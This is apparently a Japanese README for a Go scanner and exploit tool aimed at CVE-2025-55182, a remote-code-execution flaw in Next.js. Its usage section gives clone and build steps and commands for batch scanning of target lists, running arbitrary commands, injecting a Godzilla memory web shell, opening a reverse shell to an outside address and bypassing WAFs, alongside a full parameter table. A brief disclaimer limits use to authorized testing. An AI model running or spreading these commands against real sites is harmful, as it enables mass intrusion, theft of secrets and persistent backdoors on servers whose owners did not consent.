
GoベースのスキャナおよびCVE-2025-55182 (Next.js RCE) のエクスプロイトツール。バッチスキャン、コマンド実行、Godzillaメモリシェルインジェクション、リバースシェル、WAFバイパスをサポート。
CVE-2025-55182 の脆弱性スキャンおよびエクスプロイトツール。Next.js アプリケーションのリモートコード実行脆弱性を対象としています。バッチ検出、コマンド実行、哥斯拉メモリシェル注入、リバースシェル機能をサポートします。
⚠️ 本ツールはセキュリティ研究および許可されたテスト目的でのみ使用してください。不正使用は禁止です。
.txtファイルを含むフォルダをサポート。success.jsonに保存し、オプションで脆弱性URLを指定ファイルに出力。[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
注入に成功すると、ツールは哥斯拉の接続アドレス、パスワード、キー、リクエストヘッダー情報を出力します。
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json:正常に悪用されたターゲットの詳細情報(コマンド出力、哥斯拉設定など)を自動保存。-o で指定したファイル:脆弱性URLのリストを保存(1行に1つ)。スキャン中はプログレスバーと発見された脆弱性がリアルタイム表示され、最後に統計情報が出力されます。
-p パラメータでプロキシを設定してください。-to パラメータの値を適宜増やしてください。本ツールはセキュリティ研究および許可されたテスト目的のみに使用され、使用者は一切の法的責任を負うものとします。開発者は不正使用について一切の責任を負いません。
| パラメータ | 型 | デフォルト値 | 説明 |
|---|
-u | string | なし | 単一ターゲットURL(例:http://example.com:3000) |
-f | string | なし | URLリストを含むファイル(1行に1つ) |
-d | string | なし | 複数の .txt ファイルを含むフォルダ |
-o | string | なし | 出力ファイル(脆弱性URLを保存、1行に1つ) |
-t | int | 10 | 同時スレッド数 |
-to | int | 10 | リクエストタイムアウト(秒) |
-c | string | なし | 実行するコマンド(例:id) |
-m | string | なし | モード:waf(WAF回避を有効化) |
-p | string | なし | HTTPプロキシ(例:http://127.0.0.1:8080) |
-g | bool | false | 哥斯拉メモリシェル注入を有効化 |
-rs | string | なし | リバースシェルアドレス(形式 IP:PORT) |
-dv | bool | false | 詳細モード(各URLのスキャン過程を表示) |
-es | bool | false | 機密情報スキャンモード |